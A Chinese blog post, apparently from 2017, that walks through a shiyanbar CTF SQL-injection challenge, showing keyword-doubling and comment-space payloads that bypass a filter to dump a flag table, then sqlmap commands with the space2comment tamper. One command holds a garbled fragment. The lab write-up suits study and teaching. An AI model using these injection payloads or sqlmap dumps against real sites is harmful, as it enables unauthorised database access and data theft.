实验吧简单的sql注入--三题答案一样--_--
2017-09-03 21:01
274 查看
简单的sql注入
关键字被过滤了
空格被过滤了
1'/**/unionunion/**/selectselect/**/table_name/**/fromfrom/**/information_schema.tables/**/wherewhere/**//**/'1'='1
这样尝试爆出表名来,居然报错,好吧 我来两个空格(空格被过滤了),估计是有个过滤函数
1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1
这样可以得到表flag,但是下面同样的方法得不到列字段(下面方法2可以得到)
最后就猜测试试列是flag
1' unionunion selectselect flag fromfrom flag wherewhere '1'='1
结果就成了。
第二种做法:基于windows下的sqlmap:
这里我们会用到tamper,是Python写的,sqlmap一般自带,主要的作用是绕过WAF ,空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等。
这里用的level参数是执行测试的等级(1-5,默认为1) ,sqlmap默认测试所有的GET和POST参数,当–level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。
E:\CTF\sqlmap>python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --dbs
继续在web1数据库中查找
E:\CTF\sqlmap>python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment -D web1 --table
继续找吧
E:\CTF\sqlmap>python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment -D web1 -T flag --colu af40 mn
接下来就直接看结果吧
E:\CTF\sqlmap>python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment -D web1 -T flag -C flag --dump
参考
参考
相关文章推荐
- 实验吧简单的sql注入解题思路
- SQL注入自学[第二学:注入环境的简单突破]
- 利用 c++模板 类型 推导思想,实现最简单的 判断两个类型 是否一样的 方法
- 简单squid 缓存服务器配置--献给和我一样的新手
- 【龙书答案】第二章 一个简单的语法制导翻译器
- 如何改变TextView的textColor的颜色或背景像radioButton一样简单。
- delphi多线程程序示例(与.net一样简单)
- 揭秘丝路网站创建者:他让买毒品就像买书一样简单
- 火星人谚语系列之三:正确的答案一定简单
- 爆款论文提出简单循环单元SRU:像CNN一样快速训练RNN(附开源代码)
- 【转】之简单分析什么是SQL注入漏洞
- 为复杂的问题找一个简单的答案
- 简单分析SQL注入中对汉字的猜解
- SQL注入简单判断
- C++经典程序100例(附答案)【1】(希望一些像我一样的新手能够从这些习题中取得进步)
- 把JSP想成和ASP一样简单【原创】
- 让交叉编译就像本机编译一样简单:Scratchbox2的使用
- 汇编语言程序设计学习笔记(第一遍学习)-第4节:汇编就像HTML一样简单
- [置顶] php版的jQuery 向jQuery一样简单的获取html标签的内容